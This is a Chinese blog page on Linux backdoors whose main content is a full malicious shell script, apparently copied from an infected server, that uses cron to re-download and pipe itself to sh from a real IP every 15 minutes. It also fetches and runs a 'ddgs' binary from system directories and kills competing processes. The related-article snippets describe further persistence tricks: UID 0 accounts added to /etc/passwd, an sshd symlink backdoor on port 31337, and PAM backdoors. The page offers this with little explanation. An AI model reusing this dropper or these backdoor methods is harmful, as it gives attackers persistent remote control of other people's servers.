linux创建后门账户,Linux后门

最新推荐文章于 2024-05-07 08:31:17 发布
最新推荐文章于 2024-05-07 08:31:17 发布
阅读量666 收藏
点赞数
文章标签: linux创建后门账户

利用系统若口令,插入任务计划,生成后门

b55832f04bf7b19d48e5f42626cebf4c.png

wget -q http://119.9.106.27:8000/static/3022/ddgs.$(uname -m) -O mlfobce

http://119.9.106.27:8000/i.sh

-----------------------------------------------------------i.sh-----------------------------------------------------------------

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

echo "*/15 * * * * (curl -fsSL http://119.9.106.27:8000/i.sh||wget -q -O- http://119.9.106.27:8000/i.sh) | sh" | crontab -

echo "" > /var/spool/cron/root

echo "*/15 * * * * wget -q -O- http://119.9.106.27:8000/i.sh | sh" >> /var/spool/cron/root

mkdir -p /var/spool/cron/crontabs

echo "" > /var/spool/cron/crontabs/root

echo "*/15 * * * * wget -q -O- http://119.9.106.27:8000/i.sh | sh" >> /var/spool/cron/crontabs/root

cd /tmp

touch /usr/local/bin/writeable && cd /usr/local/bin/

touch /usr/libexec/writeable && cd /usr/libexec/

touch /usr/bin/writeable && cd /usr/bin/

rm -rf /usr/local/bin/writeable /usr/libexec/writeable /usr/bin/writeable

export PATH=$PATH:$(pwd)

ps auxf | grep -v grep | grep mlfobce || rm -rf mlfobce

if [ ! -f "mlfobce" ]; then

wget -q http://119.9.106.27:8000/static/3022/ddgs.$(uname -m) -O mlfobce

fi

chmod +x mlfobce

$(pwd)/mlfobce || /usr/bin/mlfobce || /usr/libexec/mlfobce || /usr/local/bin/mlfobce || mlfobce || ./mlfobce || /tmp/mlfobce

ps auxf | grep -v grep | grep mlfobcb | awk '{print $2}' | xargs kill -9

ps auxf | grep -v grep | grep mlfobcd | awk '{print $2}' | xargs kill -9

--------------------------------------------------------------------------------------------

肥魔
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
操作系统权限维持(九)之Linux系统-添加用户后门
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
03-27 401
现在用户被添加到了目标服务器的/etc/passwd文件中,我们使用kali机器去连接admin这个用户作为后门
Linux useradd userdel命令
小楼一夜听春雨,深巷明朝卖杏花
03-31 727
Linux 系统中,可以使用useradd 命令新建用户,此命令的基本格式如下: [root@localhost ~]#useradd [选项] 用户名 该命令常用的选项及各自的含义,如表 1 所示。 表 1 useradd命令常用选项 选项 含义 -u UID 手工指定用户的 UID,注意 UID 的范围(不要小于 500)。 -d 主目录 手工指定用户...
Linux常见后门(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
Libra1313的博客
05-07 2239
Rootkit 是网络犯罪分子用来控制目标计算机或网络的软件。Rootkit 有时可以显示为单个软件,但通常由一系列工具组成,这些工具允许黑客对目标设备进行管理员级控制。黑客通过多种方式在目标计算机上安装 Rootkit:最常见的是通过网络钓鱼或其他类型的社会工程攻击。受害者在不知不觉中下载并安装隐藏在计算机上运行的其他进程中的恶意软件,并让黑客控制操作系统的几乎所有方面。另一种方法是利用漏洞(即软件或未更新的操作系统中的弱点)并将 Rootkit 强制安装到计算机上。
Linux权限维持—后门
good good study
04-18 3719
Rootkit是一种特殊的恶意软件,它的功能是在安装目标上隐藏自身及指定的文件、进程和网络链接等信息,比较多见到的是Rootkit一般都和木马、后门等其他恶意程序结合使用。 rootkit是linux平台下最常见的一种木马后门工具,它主要是通过替换系统文件来达到入侵和隐藏的目的。rootkit主要分为文件级别的和内核级别的
持久化:利用Linux PAM创建后门
qq_68163788的博客
02-19 1380
PAM(Pluggable Authentication Modules)是Linux系统中用于身份验证的模块化框架。通过利用PAM,可以创建一个后门来绕过系统的认证机制,从而获得未经授权的访问权限。 要创建一个后门,首先需要编写一个自定义的PAM模块,该模块可以在用户登录时执行特定的操作,例如绕过密码验证或者添加一个额外的认证方式。接着,将这个自定义的PAM模块加载到系统中,并配置PAM以在用户登录时使用该模块。 通过这种方式,攻击者可以在系统中创建一个隐藏的后门,同时绕过正常的认证流程,
重返自己的战场——浅谈LINUX下的后门技术.pdf
09-07
Linux系统中的用户分为root、普通用户和系统用户三类,系统用户往往有特定的用途,它们可能成为黑客的潜在入口,因为root用户可能忽视对这些账户的监控。 为了重返系统,一些黑客会直接篡改“/etc/passwd”和“/etc...
Linux提权的简单总结1
08-03
Linux系统中,权限管理是安全的核心组成部分...在Linux提权中,了解文件权限、系统信息、用户账户管理和内核漏洞是关键。在实践中,要遵循安全原则,确保合法授权,并时刻关注系统的安全更新和补丁,防止被非法提权。
linux操作系统PAM模块实例
11-06
Linux 操作系统 PAM 模块实例详解 PAM(Pluggable Authentication Modules)是由 Sun 公司...但是,如果不当使用 PAM 模块,也可以给 Linux后门,降低系统安全性。因此,在使用 PAM 模块时,需要非常小心和谨慎。
Linux操作系统安全及入侵排查
09-30
本PPT介绍: 1、Linux操作系统的安全配置,通过设置这些配置项可以在...、检查账户、检查文件、检查系统启动项和计划任务、检查进程和网络连接、检查是否存留后门等恶意程序,根据上述检查内容提供相关的操作及说明。
linux-PowerThIEf一个InternetExplorerPostExploitation库
08-13
3. **横向移动**:一旦获取了一个账户的访问权,PowerThIEf可能会尝试访问网络上的其他系统。 4. **持久化**:设置后门或服务,使得即使在系统重启后,攻击者仍能保持访问。 5. **数据盗窃**:从浏览器历史、缓存、...
LINUX后门--教程(一)—— 增加超级用户帐号
W小哥
06-01 4248
一、本教程作用 1、用在攻击的途径上 2、应急响应过程中,黑客会留后门,如果你连这种留后门方法都不会,怎么去应急? 不知攻,焉知防 二、增加超级用户帐号-教程 **前提条件:**假设在攻击的过程中通过利用各种getshell,已经拿到目标服务器root权限 2.1 第一种情况:可以交互且允许uid=0的用户远程登录 增加超级用户账号命令: echo "cshm:x:0:0::/:/bin/sh" >> /etc/passwd #增加超级用户账号 passwd cshm #修改cshm的密码为cs
Linux 下qW3xT.2,解决挖矿病毒
yk10010的博客
08-13 1624
早上开启电脑,连接服务器,使用top查看cpu状态。结果显示进程占用cpu99%以上。 在网上百度,了解到qW3xT.2是一个挖矿病毒。也就是说别人利用你的电脑挖矿。谋取利益。 解决办法: 1、首先解决redis入口问题,因为最开始没有设置密码,所以首先修改redis.conf。设置密码,然后重启redis 2、进入/tmp文件夹下。发现qW3xT.2文件,删除。之后kill掉qW3x...
Linux 多个留后门姿势
热门推荐
3569
08-17 2万+
https://www.anquanke.com/post/id/155943 在一次渗透中,成功获取某目标几台比较重要的机器,当时只想着获取脱库,结果动静太大被发现了,之前渗透并没太在意Linux维持权限,经过此次事后从Google找各种资料,一款满意的rootkit都没有,现在一直在关注这方面,但还是没有找到满意的后门,在渗透圈一个人的资源总是有限往往你全力追求的,也不过是别人的一层关系就可...
linux 系统使用 cymothoa 添加后门
发哥微课堂
01-27 2886
0x00:介绍 cymothoa 是一个后门工具,利用代码 shellcode 会被注入到进程中,只要进程存在,后门就会有效,所以一般选择一些自其服务的进程来注入,例如 web 服务 mysql,apache 等。其后门所拥有的权限和注入的进程权限是相同的。当拿下目标 shell 后就可以使用 cymothoa 添加后门了。 0x01:使用 首先已经有了一个机器的 shell,我这里是 me...
linux添加后门方法,超初级的linux后门制作方法
weixin_39667509的博客
05-10 187
超初级的linux后门制作方法更新时间:2006年10月24日 00:00:00 作者:众所周知,Linux的文件权限如: 777;666等,其实只要在相应的文件上加上UID的权限,就可以用到加权限人的身份去运行这个文件。所以我们只需要将bash复制出来到另一个地方,然后用root加上UID权限,只要用户运行此Shell就可以用用root的身份来执行任何文件了一个文件都有一个所有者, 表示该文...
创建linux/unix后门方法总结
weixin_34391445的博客
07-21 177
初级篇   最简单的方法,就是在口令文件 passwd 中增加一个 UID 为 0 的帐号。但最好别这么做,因为只要系统管理员检查口令文件就会“漏馅”了。以下是在 /etc/passwd 口令文件中添加一个 UID 0 帐号的C程序。 <++> backdoor/backdoor1.c #include main() { FILE *fd...
linux后门
一个码农的笔记
04-25 2404
如果你登陆到一台linux设备,并且拿到了了root权限,但是你不希望他丢,那么你要建立后门 首先第一种方法: ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=31337 登陆的方式是: ssh root@ip -p 31337 密码随意 这种方法不太稳定,经常会因为各种原因失效。 第二种方法: [root@localhost
实战Linux vim后门
04-03
本文主要探讨的是实战中的Linux环境下Vim后门的相关知识,特别是关注于Vim配置的加载过程和安全问题。Vim是Vi Improved的增强版,作为一款强大的文本编辑器,它在程序员和文本编辑爱好者中广受欢迎,其特性包括代码...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值